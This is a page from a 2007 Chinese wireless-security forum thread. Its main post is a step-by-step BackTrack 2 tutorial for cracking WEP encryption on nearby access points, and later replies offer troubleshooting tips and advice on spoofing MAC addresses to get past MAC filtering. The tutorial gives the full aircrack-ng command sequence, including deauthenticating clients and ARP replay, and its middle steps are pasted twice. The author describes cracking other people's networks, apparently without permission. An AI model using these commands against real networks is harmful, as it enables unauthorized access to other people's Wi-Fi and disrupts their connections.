[推荐]backtrack2破解WEP中文实用教程 - 无线安全新手入门 - 无线论坛

ggdlyg 发表于 2007-6-30 20:57

下载的软件，上面的网页链接已有，请下最新版，并用迅雷等工具下载．有的朋友在打开backtrack的时候，输入startx后出现黑屏，请先运行xconf,然后再运行startx，这样不同的显卡都可正常运行此程式．在软件中，破解时，请大家找到相应的菜单后输入命令．输入的命令，要按你实际破解的情况输入各个参数．比如频道，示例为６，你的输入过程中要按你实际破解的频道输入，ＡＰ和client的ＭＡＣ要按你要破解的实际情况填入，一定要正确，那两个函数可不建立，但在后面的命令中需填入ＭＡＣ时要填全实际ＭＡＣ，而不是函数．关于各种不同的网卡，请大家在破解时在各个命令填入你自己监听的正确接口网卡名，如ＡＴＨ１，等．

igarden 发表于 2007-8-2 17:25

楼上的  你跟我的问题一样  我也折腾了半个月，晕头转向   不过昨天晚上终于成功了   多试验几次  成功是曲折的，等你成功后会更加喜悦

igarden 发表于 2007-8-2 17:36

再回：我的问题依然是最后没有ARP数目，毫无动静，回头查看前面的过程，竟然什么毛病也查不出来，郁闷～ 没有找到客户端

ggdlyg 发表于 2007-7-19 11:40

今日有空,结合老外贴子,做个破解WEP教程,对自己原贴进行补充细化,请大家指教,转载请注明出处.1、  要破解WEP，首先要确认你周围有没有WEP加密的AP，连WEP网络都没有你就不要谈什么破解了，要查找WEP网络可以用netstumbler探查，但这个软件对于所有加密它都显示为WEP，准确率不高，大家要注意一下。2、  下载backtrack2，地址在回贴中可找到，可下载最新版。用iso文件刻成光盘。在BIOS中将电脑设为光驱起动。用刻好的光盘放入光驱中，启动电脑，进入linux画面，用户名root ,密码toor,输入显示命令startx，可以完成系统运行，如果在输入后出现黑屏，重新启动电脑，在输入用户名和密码后，输入xconf，显卡自动配置命令，再输入startx,即可启动系统。3、  确认你的网卡是否被backtrack2所支持。在命令对话框内输入   ifconfig -a   查看自己网卡的型号，接口4、  以下是已确认可以支持的网卡    -----PCMCIA Cards 1 3COM 3CRWE154G72 v1 2 AirLink101 AWLC4130 3 ASUS WL100G 4 Belkin F5D7010 V1000 5 Belkin F5D7010 V5000 6 Belkin F5D7010 V6000 7 Belkin F5D7011 8 Buffalo WLI-CB-G54HP 9 Cisco AIR-PCM350 10 Cisco Aironet AIR-CB21AG-A-K9 11 Dlink DWL-650+ 12 Dlink DWL-G650 13 Dlink DWL-G650M 14 Dlink DWL-G650+ 15 D-Link WNA-1330 16 Linksys WPC54G v3 17 NetGear MA401 18 NetGear WPN511 19 NetGear WG511T 20 NetGear WAG511v2 21 NetGear WG511 v1 22 NetGear WPN511GR 23 PROXIM ORiNOCO 802.11b/g Gold (Model: 8470-WD) 24 Senao NL-2511CD PLUS EXT2 25 Senao Sl-2511CD Plus EXT2 26 SMC 2532W-B 27 SMC WCB-G 28 SWEEX LW051 ver:1.0 29 TP-link SuperG&eXtended Range 108M Wireless Cardbus Adapter(TL-WN610G) 30 Ubiquiti SRC 31 Wistron WLAN 802.11a/b/g Cardbus CB9-GP 32 X-Micro WLAN 11g PCMCIA Card (XWL-11GPAG) 33 ZCom XI-325HP+ 34 Zyxel ZyAIR G-100 PCMCIA Card (FCC ID:N89-WE601l) ----USB Card 1 ALFA Networks AWUS036H 2 ASUS WL-167G 3 AVM Fritz!Wlan USB V1.1 4 Buffalo Airstation G54 WLI-U2-KG54-AI (2A) 5 Chiefmax 6 D-Link DWL 122 (USB) F/W 3.2.1 H/W A1 7 D-Link DWL G122 (USB) F/W 2.03 B1 8 D-Link WUA-1340 9 Edimax EW-7318USG 10 Linksys WUSB54g v4 11 Linksys WUSB54GC 12 NetGear WG111v2 13 NetGear WG111T 14 Netopia ter/gusb-e 15 SafeCom SWMULZ-5400 16 ZyDAS 1211 5、  找到kismet菜单，点击运行，选择临时文件夹，选择网卡接口，如WIFI0,启动KISMET，在窗口中一个个AP全部露出真容，就是选择不广播SSID的，一会儿也显了出来，看看各AP的加密方式，选择WEP加密的，用笔记下来他的名称，mac，按键对窗口进行整理，再按上下键选择将要破解的的AP，按C键，可以查看这个AP的客户端，记下该客户端的MAC。如果确认有客户端，破解进程很快。如果没有客户端，破解方法有点不同，需要两台电脑，同时进行，我没有试过，不过有一个网友高手已试过，二十分钟也成功破解。6．找到airmon菜单,在窗口中输入命令如下airmon-ng start wifi0 6注:其中wifi后面为对应要破解的频道再输入wlanconfig ath0 destroy注:其中ath0替换为你的网卡接口再输入ifxonfig ath1 up注:其中ath1替换为你的网卡监听接口再输入iwconfig ath1 mode monitor channel 6注:channel 后面跟的是你要破解的频道,ath1替换为你的网卡的监听接口７．上面窗口不关闭，另找到airodump窗口输入命令airodump-ng --ivs -w name -c 6 ath1注:airodump-ng为抓包命令,--ivs 只抓包wep包,光盘驱动,内存有限,用此项节省内存,-w后面跟的是保存文件的名称,实际保存名称会变成name-01.ivs,-c后面跟的是你要破解的频道,ath1为你的网卡监听接口这时你会发现电脑会打开一个抓包窗口,显示出AP名称,mac地址,如果有客户端将在下面显示出来,在station下面是客户端的mac,这个客户端一定要和你要破解的ap对应,记下他们,这些应和kismet找到的一致.８．上面窗口不关闭，另找到aireplay菜单输入命令aireplay-ng -0 10 -a ap的mac -c 客户端的mac ath1输入此命令攻击客户端让他掉线重连以便产生ARP请求,这两个mac地址一定要正确,ath1替换为你的网卡监听接口再输入aireplay-ng -3 -b ap的mac -h 客户端的mac ath1这个语句用来抓包，找到合适的包，就开如发攻击包这时如果攻击成功的话，你会看airodump窗口的date不住增长在包增加到一万以上，不关闭以上窗口，另找到aircrack窗口９．输入命令如下aircrack-ng -n 64 -b ap的mac name-01.ivs-n后面跟破解Ｗep是６４位还是１２８位，文件名称可以输入ls命令查看，以实际为准.好了，数分钟之后，密码就会出现在你面前．6．找到airmon菜单,在窗口中输入命令如下airmon-ng start wifi0 6注:其中wifi后面为对应要破解的频道再输入wlanconfig ath0 destroy注:其中ath0替换为你的网卡接口再输入ifxonfig ath1 up注:其中ath1替换为你的网卡监听接口再输入iwconfig ath1 mode monitor channel 6注:channel 后面跟的是你要破解的频道,ath1替换为你的网卡的监听接口７．上面窗口不关闭，另找到airodump窗口输入命令airodump-ng --ivs -w name -c 6 ath1注:airodump-ng为抓包命令,--ivs 只抓包wep包,光盘驱动,内存有限,用此项节省内存,-w后面跟的是保存文件的名称,实际保存名称会变成name-01.ivs,-c后面跟的是你要破解的频道,ath1为你的网卡监听接口这时你会发现电脑会打开一个抓包窗口,显示出AP名称,mac地址,如果有客户端将在下面显示出来,在station下面是客户端的mac,这个客户端一定要和你要破解的ap对应,记下他们,这些应和kismet找到的一致.８．上面窗口不关闭，另找到aireplay菜单输入命令aireplay-ng -0 10 -a ap的mac -c 客户端的mac ath1输入此命令攻击客户端让他掉线重连以便产生ARP请求,这两个mac地址一定要正确,ath1替换为你的网卡监听接口再输入aireplay-ng -3 -b ap的mac -h 客户端的mac ath1这个语句用来抓包，找到合适的包，就开如发攻击包这时如果攻击成功的话，你会看airodump窗口的date不住增长在包增加到一万以上，不关闭以上窗口，另找到aircrack窗口９．输入命令如下aircrack-ng -n 64 -b ap的mac name-01.ivs-n后面跟破解Ｗep是６４位还是１２８位，文件名称可以输入ls命令查看，以实际为准.好了，数分钟之后，密码就会出现在你面前．
[此贴子已经被tange于2007-7-23 18:59:19编辑过]

ggdlyg 发表于 2007-7-20 21:50

上面输入中有个命令错误应为ifconfig ath1 up

ggdlyg 发表于 2007-7-23 16:18

管理员,请将我26楼27楼贴放到一楼,并将题目改为  backtrack2破解WEP中文实用教程谢谢!

tange 发表于 2007-7-23 19:02

<div class="msgheader">QUOTE:</div><div class="msgborder">以下是引用ggdlyg在2007-7-23 16:18:10的发言： 管理员,请将我26楼27楼贴放到一楼,并将题目改为  backtrack2破解WEP中文实用教程谢谢!</div>已设置好。

cnjsyzpp 发表于 2007-7-26 16:09

请教,现有一网络,没有安全认证.但是关闭了DHCP功能,我无法连到AP上,如何找出AP的IP呢?

ggdlyg 发表于 2007-7-26 16:43

有两种可能 1、对方没有启用DHCP 试一下192.168.0.1 192.168.1.1 192.168.1.2 没有用的话，下载一个omnipeek抓包分析，只要对方上网一定会发现IP 2、对方用了mac过滤 用软件将自己mac设为跟对方一样 对方mac可以用很多软件查到，包括omnipeek

yourvision 发表于 2007-7-26 23:32

<div class="msgheader">QUOTE:</div><div class="msgborder">以下是引用ggdlyg在2007-7-19 11:40:33的发言：  ... 5、 找到kismet菜单，点击运行，选择临时文件夹，选择网卡接口，如WIFI0,启动KISMET，在窗口中一个个AP全部露出真容，就是选择不广播SSID的，一会儿也显了出来，看看各AP的加密方式，选择WEP加密的，用笔记下来他的名称，mac，按键对窗口进行整理，再按上下键选择将要破解的的AP，按C键，可以查看这个AP的客户端，记下该客户端的MAC。如果确认有客户端，破解进程很快...</div>先感谢楼主也能分享破解经验！：） 不过这里有个问题。在执行以上这步以前，是否应该先激活网卡，因为如果没有激活，Kismet根本就没有反应。 “找到kismet菜单，点击运行，选择临时文件夹，选择网卡接口，如WIFI0,启动KISMET” 这句话如何正确执行？点击运行 Kismet 后，哪里可以选择临时文件夹并选择网卡接口？我这里如果不激活网卡，Kismet就无法运行，而激活后点击，则是直接进入主画面，无法选择临时文件夹或网卡接口。
还有，这里的网卡接口和下文的网卡监听接口到底是如何区别的，从哪里可以知道什么是接口，什么是监听接口？
都说Kismet 可以显示所有AP的SSID，但是我这里依然有很多AP的SSID无法显示，是不是得有些具体的操作才行？ 希望各路高手们都来讨论一下～多谢！

ggdlyg 发表于 2007-7-27 11:22

如果你对此不熟悉，建议你不要用KISMET，而上网上下载netstumbler，在WINDOWS下进行寻托要破解的网络，然后再运行backtrack2,操按教程激活网卡的监听端口，直接运行aiodump-ng ,如果有人上网过一会就会发现客户端的.你再接着往下运行即可. 如果没有对方SSID,运行airodump-ng,如果有客户端的话过比较长时间,也会显出他的名字.这一点有KISMET一样,而且不比它慢.我已试过,并成功. 如果在backtrack2运行KISMET后,我一般都是重起机器,再进行破解,不然也会发生端口找不到现象.

ggdlyg 发表于 2007-7-27 11:26

有人问,抓不到ARP请求,那是对方没有客户端上网.你可以明天再试,只要它上网二十分钟,一定行的. 我破前二个的时候,很顺利,都是一次成功,但破第三个的时候,守了三天才发现对方上网,二十分钟即破了.

页: 1 2 [3] 4 5

无线论坛's Archiver